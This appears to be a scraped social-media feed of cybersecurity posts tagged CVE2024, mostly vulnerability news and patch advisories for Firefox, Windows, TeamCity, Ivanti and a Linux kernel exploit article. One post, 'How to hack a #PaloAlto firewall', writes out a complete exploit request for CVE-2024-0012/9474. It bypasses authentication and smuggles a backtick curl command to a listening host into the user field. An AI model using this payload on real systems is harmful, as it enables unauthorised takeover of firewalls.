Kernel-hack-drill and a new approach to exploiting CVE-2024-50264 in the Linux kernel

Some memory corruption bugs are much harder to exploit than others. They can involve race conditions, crash the system, and impose limitations that make a researcher's life difficult. Working with such fragile vulnerabilities demands significant time and effort. CVE-2024-50264 in the Linux kernel is one such hard bug, which received the Pwnie Award 2025 as the Best Privilege Escalation. In this article, I introduce my personal project kernel-hack-drill and show how it helped me to exploit CVE-2024-50264.

Alexander Popov
๐Ÿ Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
python strikes again

YouTube
Microsoft's December Patch Tuesday is here! ๐ŸŽ‰ It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. ๐Ÿšจ Windows users should update ASAP to stay secure! ๐Ÿ’ป๐Ÿ”’ Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz
Windows 11 December Patch Tuesday Fixes 72 Flaws, One Zero-Day

Microsoft's December Windows Patch addresses 72 flaws, including an actively exploited zero-day flaw in the Common Log File System Driver.

CyberInsider

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/

#CVE20240012 #CVE20249474 #CVE #CVE2024

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

It'll be no surprise that 2024, 2023, 2022, and every other year of humanities' existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks firewall and SSLVPN offering, and as ever, weโ€™re here to

watchTowr Labs

๐Ÿšจ Did you know cyber espionage groups like Earth Simnavaz can remain undetected for months, exploiting vulnerabilities like CVE-2024-30088 to target critical infrastructure? ๐Ÿ”’

Tip: Always patch known vulnerabilities quicklyโ€”delaying can leave systems exposed to advanced threats like these!

How do you prioritize patch management in your organization? ๐Ÿค”

Dive deeper into this evolving threat on our blog: https://guardiansofcyber.com/cybersecurity-news/earth-simnavaz-cyberattacks-exploiting-cve-2024-30088-to-target-uae-critical-infrastructure-with-stealthy-backdoors/

#Cybersecurity #GuardiansOfCyber #Guardians #APT #Vulnerability #ZeroDay #EarthSimnavaz #CyberThreats #CriticalInfrastructure #CVE2024

๐Ÿšจ Did you know a simple animation bug could leave your entire browser vulnerable? The latest CVE-2024-9680 exploit targets Firefox and Thunderbird, allowing attackers to execute code without you even knowing! ๐Ÿ˜จ

To stay safe: Update your browser ASAP and always keep auto-updates enabled. These tiny steps make a huge difference in staying protected. ๐Ÿ”’

Have you ever been caught off guard by an update you didn't take seriously? Share your stories below!

Read more about the vulnerability and how to protect yourself: https://guardiansofcyber.com/cybersecurity-news/critical-cve-2024-9680-firefox-and-thunderbird-vulnerabilities-exploited-in-the-wild-patch-now-to-prevent-code-execution-attacks/

#Cybersecurity #GuardiansOfCyber #Guardians #CVE2024 #FirefoxVulnerability #PatchNow #BrowserSecurity #CyberAlert #InfoSec #StaySafeOnline

Critical Exim vulnerability affects 1.5 million servers worldwide

A critical security vulnerability in the widely-used mail transfer agent (MTA) Exim has put over 1.5 million email servers at risk worldwide. This issue,

Stack Diary

High-Impact Security Vulnerabilities in Firefox 128

Date: July 9, 2024
CVE: CVE-2024-6605 CVE-2024-6606 CVE-2024-6607 CVE-2024-6608 CVE-2024-6609 CVE-2024-6610 CVE-2024-6600 CVE-2024-6601 CVE-2024-6602 CVE-2024-6603 CVE-2024-6611 CVE-2024-6612 CVE-2024-6613 CVE-2024-6614 CVE-2024-6604 CVE-2024-6615
Vulnerability Type: Tapjacking
CWE: [[CWE-451]], [[CWE-922]]
Sources: Mozilla Security Advisory

Synopsis

Multiple security vulnerabilities were addressed in the latest Firefox 128 release, impacting both the desktop and Android versions. These vulnerabilities, if exploited, could lead to severe security breaches including tapjacking, out-of-bounds read, and memory corruption.

A list of all the CVEs mentioned in the Mozilla Foundation Security Advisory 2024-29:

  • CVE-2024-6605: Firefox Android missed activation delay to prevent tapjacking (High)
  • CVE-2024-6606: Out-of-bounds read in clipboard component (High)
  • CVE-2024-6607: Leaving pointerlock by pressing the escape key could be prevented (Moderate)
  • CVE-2024-6608: Cursor could be moved out of the viewport using pointerlock (Moderate)
  • CVE-2024-6609: Memory corruption in NSS (Moderate)
  • CVE-2024-6610: Form validation popups could block exiting full-screen mode (Moderate)
  • CVE-2024-6600: Memory corruption in WebGL API (Moderate)
  • CVE-2024-6601: Race condition in permission assignment (Moderate)
  • CVE-2024-6602: Memory corruption in NSS (Moderate)
  • CVE-2024-6603: Memory corruption in thread creation (Moderate)
  • CVE-2024-6611: Incorrect handling of SameSite cookies (Low)
  • CVE-2024-6612: CSP violation leakage when using devtools (Low)
  • CVE-2024-6613: Incorrect listing of stack frames (Low)
  • CVE-2024-6614: Incorrect listing of stack frames (Low)
  • CVE-2024-6604: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (High)
  • CVE-2024-6615: Memory safety bugs fixed in Firefox 128 (High)
  • Issue Summary

    Mozilla announced fixes for several high-impact vulnerabilities in Firefox 128. Notably, CVE-2024-6606 which involves out-of-bounds read issues in the clipboard component, and CVE-2024-6609 related to memory corruption in the NSS library.

    Technical Key Findings

    CVE-2024-6605 allows attackers to overlay malicious prompts over legitimate permission dialogs, potentially tricking users into granting unwanted permissions. This vulnerability exploits the lack of a delay in activating permission prompts on Firefox Android, enabling immediate interactions which can be hijacked by malicious actors.

    Vulnerable Products

    • Firefox versions prior to 128
    • Firefox ESR versions prior to 115.13
    • Firefox Android versions prior to 128

    Impact Assessment

    If these vulnerabilities are exploited, attackers can perform actions such as reading out-of-bounds data, preventing users from exiting fullscreen mode, or executing arbitrary code. These can lead to unauthorized access to sensitive data, manipulation of browser behavior, and potential system compromises.

    Patches or Workaround

    Mozilla has released patches in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 to address these vulnerabilities. Users are advised to update to the latest versions to mitigate the risks associated with these security flaws.

    Tags

    #Firefox #CVE2024-6605 #Tapjacking #SecurityUpdate #Mozilla #Vulnerability #MemoryCorruption #OutOfBoundsRead

    Tapjacking | HackTricks

    Addressing the Ivanti Pulse Secure Vulnerability: A Call to Action Against Emerging Cyber Threats

    https://zurl.co/IQTd
    #Cybersecurity #InfoSec #IvantiPulseSecure #CVE2023 #CVE2024 #MiraiBotnet #NetworkSecurity #CyberAttack #DataProtection #SOClogix

    Addressing the Ivanti Pulse Secure Vulnerability: A Call to Action Against Emerging Cyber Threats

    The cybersecurity landscape is facing a significant threat from a newly disclosed set of vulnerabilities in Ivanti Pulse Secure systems. Juniper Threat Labs' recent findings have highlighted active exploitation attempts, including the delivery of Mirai botnets, posing a grave risk to network securit

    "๐Ÿšจ Urgent TeamCity Vulnerabilities Alert! Patch Now! ๐Ÿšจ"

    JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. ๐Ÿ›ก๏ธ๐Ÿ’ป

    ๐Ÿ”— Source: BleepingComputer

    Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec

    ๐ŸŒ๐Ÿ”๐Ÿ‘ฅ

    Exploit available for new critical TeamCity auth bypass bug, patch now

    A critical vulnerability (CVE-2024-27198) in the TeamCity On-Premises CI/CD solution from JetBrains can let a remote unauthenticated attacker take control of the server with administrative permissions.

    BleepingComputer